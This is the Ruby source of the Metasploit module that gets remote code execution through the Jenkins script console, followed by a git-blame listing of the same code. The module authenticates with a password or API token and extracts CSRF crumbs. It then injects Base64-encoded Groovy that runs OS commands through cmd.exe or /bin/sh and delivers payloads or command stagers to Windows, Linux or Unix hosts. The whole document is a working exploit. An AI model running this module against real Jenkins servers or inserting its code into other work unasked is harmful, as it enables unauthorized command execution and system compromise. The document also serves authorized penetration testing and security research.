modules/exploits/multi/http/jenkins_script_console.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HTTP::Jenkins

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Jenkins-CI Script-Console Java Execution',
        'Description' => %q{
          This module uses the Jenkins-CI Groovy script console to execute
          OS commands using Java.
        },
        'Author' => [
          'Spencer McIntyre',
          'jamcut',
          'thesubtlety'
        ],
        'License' => MSF_LICENSE,
        'DefaultOptions' => {
          'WfsDelay' => '10'
        },
        'References' => [
          ['URL', 'https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console']
        ],
        'Platform' => %w[win linux unix],
        'Targets' => [
          [
            'Windows',
            {
              'Arch' => [ ARCH_X64, ARCH_X86 ],
              'Platform' => 'win',
              'CmdStagerFlavor' => [ 'certutil', 'vbs' ]
            }
          ],
          ['Linux', { 'Arch' => [ ARCH_X64, ARCH_X86 ], 'Platform' => 'linux' }],
          ['Unix CMD', { 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => { 'BadChars' => "\x22" } }]
        ],
        'DisclosureDate' => '2013-01-18',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_SAFE, ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
          'Reliability' => [ REPEATABLE_SESSION, ]
        }
      )
    )

    register_options(
      [
        OptString.new('USERNAME', [ false, 'The username to authenticate as', '' ]),
        OptString.new('PASSWORD', [ false, 'The password for the specified username', '' ]),
        OptString.new('API_TOKEN', [ false, 'The API token for the specified username', '' ]),
        OptString.new('TARGETURI', [ true, 'The path to the Jenkins-CI application', '/jenkins/' ])
      ]
    )

    self.needs_cleanup = true
  end

  def post_auth?
    true
  end

  def check
    uri = target_uri
    uri.path = normalize_uri(uri.path)
    uri.path << '/' if uri.path[-1, 1] != '/'
    res = send_request_cgi({ 'uri' => "#{uri.path}login" })
    if res && res.headers.include?('X-Jenkins')
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def on_new_session(_client)
    if !@to_delete.nil?
      print_warning("Deleting #{@to_delete} payload file")
      execute_command("rm #{@to_delete}")
    end
  end

  # This method takes a command and options then attempts to make a request and returns a response
  #
  # @param [String] cmd The cmd used
  # @param [String] _opts Request options
  # @return [Rex::Proto::Http::Response, nil] res The result of the request
  def http_send_request(cmd)
    request_parameters = {
      'method' => 'POST',
      'uri' => normalize_uri(@uri.path, 'script'),
      'authorization' => basic_auth(datastore['USERNAME'], datastore['API_TOKEN']),
      'vars_post' =>
        {
          'script' => java_craft_runtime_exec(cmd),
          'Submit' => 'Run'
        }
    }
    request_parameters['vars_post'][@crumb[:name]] = @crumb[:value] unless @crumb.nil?
    send_request_cgi(request_parameters)
  end

  # This method takes a command and options then attempts to make a request to send the command
  #
  # @param [String] cmd The cmd used
  # @param [String] _opts Request options
  # @return [Rex::Proto::Http::Response] res The response of the request
  def http_send_command(cmd, _opts = {})
    res = http_send_request(cmd)

    fail_with(Failure::Unknown, 'Failed to execute the command.') if res.nil?

    # Attempt to login if we haven't previously
    if res.code == 401 && !@attempted_login
      print_status('Authentication required for Jenkins-CI Groovy script console - Logging in...')
      attempt_jenkins_login
      res = http_send_request(cmd)
    end

    fail_with(Failure::Unreachable, "#{peer} - Could not connect to Jenkins - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") if res.code != 200

    res
  end

  def java_craft_runtime_exec(cmd)
    vars = Rex::RandomIdentifier::Generator.new(
      Rex::RandomIdentifier::Generator::JavaOpts
    )
    jcode = <<~JCODE
      String #{vars[:encoded]} = "#{Rex::Text.encode_base64(cmd)}";
      byte[] #{vars[:decoded]};
      try {
        #{vars[:decoded]} = Base64.getDecoder().decode(#{vars[:encoded]});
      } catch(groovy.lang.MissingPropertyException e) {
        Object #{vars[:decoder]} = Eval.me("new sun.misc.BASE64Decoder()");
        #{vars[:decoded]} = #{vars[:decoder]}.decodeBuffer(#{vars[:encoded]});
      }
    JCODE

    jcode << "String[] #{vars[:cmd_array]} = new String[3];\n"
    if target['Platform'] == 'win'
      jcode << "#{vars[:cmd_array]}[0] = \"cmd.exe\";\n"
      jcode << "#{vars[:cmd_array]}[1] = \"/c\";\n"
    else
      jcode << "#{vars[:cmd_array]}[0] = \"/bin/sh\";\n"
      jcode << "#{vars[:cmd_array]}[1] = \"-c\";\n"
    end
    jcode << "#{vars[:cmd_array]}[2] = new String(#{vars[:decoded]}, \"UTF-8\");\n"
    jcode << "Runtime.getRuntime().exec(#{vars[:cmd_array]});\n"
    jcode
  end

  def execute_command(cmd, _opts = {})
    vprint_status("Attempting to execute: #{cmd}")
    http_send_command(cmd.to_s)
  end

  # This method makes calls to multiple methods to handle Jenkins login attempts
  def attempt_jenkins_login
    @attempted_login = true
    login_uri = jenkins_uri_check(@uri, keep_cookies: true)
    status, _proof = jenkins_login(datastore['USERNAME'], datastore['PASSWORD'], login_uri)

    if status == Metasploit::Model::Login::Status::INCORRECT
      fail_with(Msf::Module::Failure::NoAccess, "Incorrect credentials - #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
    elsif status == Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
      fail_with(Msf::Module::Failure::UnexpectedReply, 'Unexpected reply from server')
    end
  end

  def exploit
    @attempted_login = false
    @uri = target_uri
    @uri.path = normalize_uri(@uri.path)
    @uri.path << '/' if @uri.path[-1, 1] != '/'
    print_status('Checking access to the script console')
    res = send_request_cgi({ 'uri' => "#{@uri.path}script" })
    fail_with(Failure::Unknown, 'No Response received') if !res

    @crumb = nil
    if res.code != 200
      if datastore['API_TOKEN'].present?
        print_status('Authenticating with token...')
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(@uri.path, 'crumbIssuer/api/json'),
          'authorization' => basic_auth(datastore['USERNAME'], datastore['API_TOKEN'])
        })
        if (res && (res.code == 401))
          fail_with(Failure::NoAccess, 'Login failed')
        end
      else
        print_status('Logging in...')
        attempt_jenkins_login
        res = send_request_cgi({ 'uri' => "#{@uri.path}script" })

        if res.code == 403
          fail_with(Failure::NoAccess, "#{datastore['USERNAME']} does not have permissions to complete this request")
        elsif res.code != 200
          fail_with(Failure::UnexpectedReply, 'Unexpected reply from server')
        end
      end
    else
      print_status('No authentication required, skipping login...')
    end

    if res.body =~ /"\.crumb", "([a-z0-9]*)"/
      print_status("Using CSRF token: '#{Regexp.last_match(1)}' (.crumb style)")
      @crumb = { name: '.crumb', value: Regexp.last_match(1) }
    elsif res.body =~ /crumb\.init\("Jenkins-Crumb", "([a-z0-9]*)"\)/ || res.body =~ /"crumb":"([a-z0-9]*)"/
      print_status("Using CSRF token: '#{Regexp.last_match(1)}' (Jenkins-Crumb style v1)")
      @crumb = { name: 'Jenkins-Crumb', value: Regexp.last_match(1) }
    elsif res.body =~ /data-crumb-value="([a-z0-9]*)"/
      print_status("Using CSRF token: '#{Regexp.last_match(1)}' (Jenkins-Crumb style v2)")
      @crumb = { name: 'Jenkins-Crumb', value: Regexp.last_match(1) }
    end

    case target['Platform']
    when 'win'
      print_status("#{rhost}:#{rport} - Sending command stager...")
      execute_cmdstager({ linemax: 2049 })
    when 'unix'
      print_status("#{rhost}:#{rport} - Sending payload...")
      http_send_command(payload.encoded.to_s)
    when 'linux'
      print_status("#{rhost}:#{rport} - Sending Linux stager...")
      execute_cmdstager({ linemax: 2049 })
    end

    handler
  end
end
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Lower ranking because they cannot auto-target 2013-01-23 23:35:31 -06:00			`Rank = GoodRanking`
Retab modules 2013-08-30 16:28:54 -05:00
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`include Msf::Exploit::Remote::HttpClient`
Use One CMDStagermixin 2014-02-07 18:46:19 -06:00			`include Msf::Exploit::CmdStager`
Update jenkins login scanner to work with newer versions 2023-05-30 11:35:33 +01:00			`include Msf::Exploit::Remote::HTTP::Jenkins`
Retab modules 2013-08-30 16:28:54 -05:00
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`def initialize(info = {})`
Resolve rubocop issues 2022-08-25 14:41:30 -04:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'Jenkins-CI Script-Console Java Execution',`
			`'Description' => %q{`
Cleanup Jenkins-CI module titles and option descriptions 2015-09-04 10:25:51 -07:00			`This module uses the Jenkins-CI Groovy script console to execute`
Resolve rubocop issues 2022-08-25 14:41:30 -04:00			`OS commands using Java.`
			`},`
			`'Author' => [`
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`'Spencer McIntyre',`
add ability to specify API token instead of password 2017-06-15 21:05:53 -04:00			`'jamcut',`
			`'thesubtlety'`
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`],`
Resolve rubocop issues 2022-08-25 14:41:30 -04:00			`'License' => MSF_LICENSE,`
			`'DefaultOptions' => {`
			`'WfsDelay' => '10'`
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`},`
Resolve rubocop issues 2022-08-25 14:41:30 -04:00			`'References' => [`
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`['URL', 'https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console']`
			`],`
Resolve rubocop issues 2022-08-25 14:41:30 -04:00			`'Platform' => %w[win linux unix],`
			`'Targets' => [`
			`[`
			`'Windows',`
Add certutil support. 2015-09-03 13:27:10 -05:00			`{`
Implement first pass of architecture/platform refactor 2016-10-28 07:16:05 +10:00			`'Arch' => [ ARCH_X64, ARCH_X86 ],`
Add certutil support. 2015-09-03 13:27:10 -05:00			`'Platform' => 'win',`
			`'CmdStagerFlavor' => [ 'certutil', 'vbs' ]`
			`}`
			`],`
Use the standard Linux stager 2022-09-13 16:09:28 -04:00			`['Linux', { 'Arch' => [ ARCH_X64, ARCH_X86 ], 'Platform' => 'linux' }],`
Resolve rubocop issues 2022-08-25 14:41:30 -04:00			`['Unix CMD', { 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => { 'BadChars' => "\x22" } }]`
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`],`
Resolve rubocop issues 2022-08-25 14:41:30 -04:00			`'DisclosureDate' => '2013-01-18',`
			`'DefaultTarget' => 0,`
			`'Notes' => {`
			`'Stability' => [ CRASH_SAFE, ],`
Add applicable notes to my exploit modules 2018-10-27 20:54:14 -04:00			`'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],`
Resolve rubocop issues 2022-08-25 14:41:30 -04:00			`'Reliability' => [ REPEATABLE_SESSION, ]`
			`}`
			`)`
			`)`
Retab modules 2013-08-30 16:28:54 -05:00
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`register_options(`
			`[`
Resolve rubocop issues 2022-08-25 14:41:30 -04:00			`OptString.new('USERNAME', [ false, 'The username to authenticate as', '' ]),`
			`OptString.new('PASSWORD', [ false, 'The password for the specified username', '' ]),`
			`OptString.new('API_TOKEN', [ false, 'The API token for the specified username', '' ]),`
			`OptString.new('TARGETURI', [ true, 'The path to the Jenkins-CI application', '/jenkins/' ])`
			`]`
			`)`
Set `needs_cleanup` flag for exploits that need it 2019-08-02 09:48:53 -05:00
			`self.needs_cleanup = true`
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Correct false negative post_auth? status 2018-08-09 23:34:03 -05:00			`def post_auth?`
			`true`
			`end`

add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`def check`
use target_uri and normalize_uri as well as fix a cookie problem 2013-01-19 19:10:56 -05:00			`uri = target_uri`
			`uri.path = normalize_uri(uri.path)`
Resolve rubocop issues 2022-08-25 14:41:30 -04:00			`uri.path << '/' if uri.path[-1, 1] != '/'`
			`res = send_request_cgi({ 'uri' => "#{uri.path}login" })`
			`if res && res.headers.include?('X-Jenkins')`
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`return Exploit::CheckCode::Detected`
			`else`
			`return Exploit::CheckCode::Safe`
			`end`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Resolve rubocop issues 2022-08-25 14:41:30 -04:00			`def on_new_session(_client)`
			`if !@to_delete.nil?`
linux stager plus little cleanup 2013-01-20 13:42:02 +01:00			`print_warning("Deleting #{@to_delete} payload file")`
			`execute_command("rm #{@to_delete}")`
			`end`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
adds more future proofing to implementation 2023-06-12 14:08:03 +01:00			`# This method takes a command and options then attempts to make a request and returns a response`
			`#`
			`# @param [String] cmd The cmd used`
			`# @param [String] _opts Request options`
			`# @return [Rex::Proto::Http::Response, nil] res The result of the request`
			`def http_send_request(cmd)`
use target_uri and normalize_uri as well as fix a cookie problem 2013-01-19 19:10:56 -05:00			`request_parameters = {`
Resolve rubocop issues 2022-08-25 14:41:30 -04:00			`'method' => 'POST',`
			`'uri' => normalize_uri(@uri.path, 'script'),`
add ability to specify API token instead of password 2017-06-15 21:05:53 -04:00			`'authorization' => basic_auth(datastore['USERNAME'], datastore['API_TOKEN']),`
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`'vars_post' =>`
			`{`
			`'script' => java_craft_runtime_exec(cmd),`
			`'Submit' => 'Run'`
			`}`
use target_uri and normalize_uri as well as fix a cookie problem 2013-01-19 19:10:56 -05:00			`}`
Fix the jenkins exploit module for new versions 2016-10-29 18:19:14 -04:00			`request_parameters['vars_post'][@crumb[:name]] = @crumb[:value] unless @crumb.nil?`
adds more future proofing to implementation 2023-06-12 14:08:03 +01:00			`send_request_cgi(request_parameters)`
			`end`

			`# This method takes a command and options then attempts to make a request to send the command`
			`#`
			`# @param [String] cmd The cmd used`
			`# @param [String] _opts Request options`
			`# @return [Rex::Proto::Http::Response] res The response of the request`
			`def http_send_command(cmd, _opts = {})`
			`res = http_send_request(cmd)`

			`fail_with(Failure::Unknown, 'Failed to execute the command.') if res.nil?`

			`# Attempt to login if we haven't previously`
			`if res.code == 401 && !@attempted_login`
			`print_status('Authentication required for Jenkins-CI Groovy script console - Logging in...')`
			`attempt_jenkins_login`
			`res = http_send_request(cmd)`
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`end`
adds more future proofing to implementation 2023-06-12 14:08:03 +01:00
			`fail_with(Failure::Unreachable, "#{peer} - Could not connect to Jenkins - no response") if res.nil?`
			`fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") if res.code != 200`

			`res`
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`def java_craft_runtime_exec(cmd)`
Switch to using Rex::RandomIdentifier 2022-08-25 14:37:37 -04:00			`vars = Rex::RandomIdentifier::Generator.new(`
			`Rex::RandomIdentifier::Generator::JavaOpts`
			`)`
Fail back to the old method using error handling 2022-08-25 14:05:10 -04:00			`jcode = <<~JCODE`
Switch to using Rex::RandomIdentifier 2022-08-25 14:37:37 -04:00			`String #{vars[:encoded]} = "#{Rex::Text.encode_base64(cmd)}";`
			`byte[] #{vars[:decoded]};`
Fail back to the old method using error handling 2022-08-25 14:05:10 -04:00			`try {`
Support newer versions of Jenkins 2022-09-13 15:08:23 -04:00			`#{vars[:decoded]} = Base64.getDecoder().decode(#{vars[:encoded]});`
Fail back to the old method using error handling 2022-08-25 14:05:10 -04:00			`} catch(groovy.lang.MissingPropertyException e) {`
Support newer versions of Jenkins 2022-09-13 15:08:23 -04:00			`Object #{vars[:decoder]} = Eval.me("new sun.misc.BASE64Decoder()");`
			`#{vars[:decoded]} = #{vars[:decoder]}.decodeBuffer(#{vars[:encoded]});`
Fail back to the old method using error handling 2022-08-25 14:05:10 -04:00			`}`
			`JCODE`

Switch to using Rex::RandomIdentifier 2022-08-25 14:37:37 -04:00			`jcode << "String[] #{vars[:cmd_array]} = new String[3];\n"`
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`if target['Platform'] == 'win'`
Switch to using Rex::RandomIdentifier 2022-08-25 14:37:37 -04:00			`jcode << "#{vars[:cmd_array]}[0] = \"cmd.exe\";\n"`
			`jcode << "#{vars[:cmd_array]}[1] = \"/c\";\n"`
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`else`
Switch to using Rex::RandomIdentifier 2022-08-25 14:37:37 -04:00			`jcode << "#{vars[:cmd_array]}[0] = \"/bin/sh\";\n"`
			`jcode << "#{vars[:cmd_array]}[1] = \"-c\";\n"`
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`end`
Switch to using Rex::RandomIdentifier 2022-08-25 14:37:37 -04:00			`jcode << "#{vars[:cmd_array]}[2] = new String(#{vars[:decoded]}, \"UTF-8\");\n"`
			`jcode << "Runtime.getRuntime().exec(#{vars[:cmd_array]});\n"`
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`jcode`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Resolve rubocop issues 2022-08-25 14:41:30 -04:00			`def execute_command(cmd, _opts = {})`
linux stager plus little cleanup 2013-01-20 13:42:02 +01:00			`vprint_status("Attempting to execute: #{cmd}")`
Resolve rubocop issues 2022-08-25 14:41:30 -04:00			`http_send_command(cmd.to_s)`
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
adds more future proofing to implementation 2023-06-12 14:08:03 +01:00			`# This method makes calls to multiple methods to handle Jenkins login attempts`
			`def attempt_jenkins_login`
			`@attempted_login = true`
			`login_uri = jenkins_uri_check(@uri, keep_cookies: true)`
			`status, _proof = jenkins_login(datastore['USERNAME'], datastore['PASSWORD'], login_uri)`

			`if status == Metasploit::Model::Login::Status::INCORRECT`
			`fail_with(Msf::Module::Failure::NoAccess, "Incorrect credentials - #{datastore['USERNAME']}:#{datastore['PASSWORD']}")`
			`elsif status == Metasploit::Model::Login::Status::UNABLE_TO_CONNECT`
			`fail_with(Msf::Module::Failure::UnexpectedReply, 'Unexpected reply from server')`
			`end`
			`end`

add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`def exploit`
adds more future proofing to implementation 2023-06-12 14:08:03 +01:00			`@attempted_login = false`
use target_uri and normalize_uri as well as fix a cookie problem 2013-01-19 19:10:56 -05:00			`@uri = target_uri`
			`@uri.path = normalize_uri(@uri.path)`
Resolve rubocop issues 2022-08-25 14:41:30 -04:00			`@uri.path << '/' if @uri.path[-1, 1] != '/'`
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`print_status('Checking access to the script console')`
Resolve rubocop issues 2022-08-25 14:41:30 -04:00			`res = send_request_cgi({ 'uri' => "#{@uri.path}script" })`
			`fail_with(Failure::Unknown, 'No Response received') if !res`
Retab modules 2013-08-30 16:28:54 -05:00
Fix jenkins when CSRF is enabled 2014-10-14 19:33:23 -05:00			`@crumb = nil`
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`if res.code != 200`
Resolve rubocop issues 2022-08-25 14:41:30 -04:00			`if datastore['API_TOKEN'].present?`
			`print_status('Authenticating with token...')`
			`res = send_request_cgi({`
			`'method' => 'GET',`
			`'uri' => normalize_uri(@uri.path, 'crumbIssuer/api/json'),`
			`'authorization' => basic_auth(datastore['USERNAME'], datastore['API_TOKEN'])`
			`})`
			`if (res && (res.code == 401))`
			`fail_with(Failure::NoAccess, 'Login failed')`
			`end`
			`else`
			`print_status('Logging in...')`
adds more future proofing to implementation 2023-06-12 14:08:03 +01:00			`attempt_jenkins_login`
Support newer versions of Jenkins 2022-09-13 15:08:23 -04:00			`res = send_request_cgi({ 'uri' => "#{@uri.path}script" })`
adds more future proofing to implementation 2023-06-12 14:08:03 +01:00
			`if res.code == 403`
			`fail_with(Failure::NoAccess, "#{datastore['USERNAME']} does not have permissions to complete this request")`
			`elsif res.code != 200`
			`fail_with(Failure::UnexpectedReply, 'Unexpected reply from server')`
			`end`
Resolve rubocop issues 2022-08-25 14:41:30 -04:00			`end`
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`else`
			`print_status('No authentication required, skipping login...')`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Fix the jenkins exploit module for new versions 2016-10-29 18:19:14 -04:00			`if res.body =~ /"\.crumb", "([a-z0-9]*)"/`
Resolve rubocop issues 2022-08-25 14:41:30 -04:00			`print_status("Using CSRF token: '#{Regexp.last_match(1)}' (.crumb style)")`
			`@crumb = { name: '.crumb', value: Regexp.last_match(1) }`
Added docs, minor code tweak to remove duplication. 2017-06-19 17:35:41 -05:00			`elsif res.body =~ /crumb\.init\("Jenkins-Crumb", "([a-z0-9])"\)/ \|\| res.body =~ /"crumb":"([a-z0-9])"/`
Support newer versions of Jenkins 2022-09-13 15:08:23 -04:00			`print_status("Using CSRF token: '#{Regexp.last_match(1)}' (Jenkins-Crumb style v1)")`
			`@crumb = { name: 'Jenkins-Crumb', value: Regexp.last_match(1) }`
			`elsif res.body =~ /data-crumb-value="([a-z0-9]*)"/`
			`print_status("Using CSRF token: '#{Regexp.last_match(1)}' (Jenkins-Crumb style v2)")`
Resolve rubocop issues 2022-08-25 14:41:30 -04:00			`@crumb = { name: 'Jenkins-Crumb', value: Regexp.last_match(1) }`
Fix jenkins when CSRF is enabled 2014-10-14 19:33:23 -05:00			`end`

add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`case target['Platform']`
			`when 'win'`
Make cmdstager flavor explicit or from info 2014-06-28 17:40:49 -04:00			`print_status("#{rhost}:#{rport} - Sending command stager...")`
Resolve rubocop issues 2022-08-25 14:41:30 -04:00			`execute_cmdstager({ linemax: 2049 })`
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`when 'unix'`
			`print_status("#{rhost}:#{rport} - Sending payload...")`
Resolve rubocop issues 2022-08-25 14:41:30 -04:00			`http_send_command(payload.encoded.to_s)`
linux stager plus little cleanup 2013-01-20 13:42:02 +01:00			`when 'linux'`
			`print_status("#{rhost}:#{rport} - Sending Linux stager...")`
Use the standard Linux stager 2022-09-13 16:09:28 -04:00			`execute_cmdstager({ linemax: 2049 })`
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
add module to execute commands via Jenkins Script Console 2013-01-18 14:56:52 -05:00			`handler`
			`end`
			`end`